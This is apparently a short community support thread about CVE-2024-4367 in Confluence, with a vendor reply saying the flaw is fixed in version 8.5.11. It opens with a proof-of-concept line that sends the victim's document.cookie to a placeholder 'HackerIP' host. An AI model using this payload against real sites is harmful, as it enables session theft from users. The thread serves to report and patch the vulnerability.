CVE-2024-4367.py "var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://HackerIP:2024/?cookie=' + document.cookie, true); xhr.withCredentials = true; xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send();"
------
Hi Yong,
Thank you for reaching out. We can confirm that this vulnerability has been fixed under Confluence 8.5.11 version. So, you can plan to upgrade Confluence and see if you are able to reproduce this behaviour by any chance.
In context of why this is not populating under our Vulnerability Portal, we have initiated a discussion internally to fix this part.
Hope this information helps.
Thanks
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.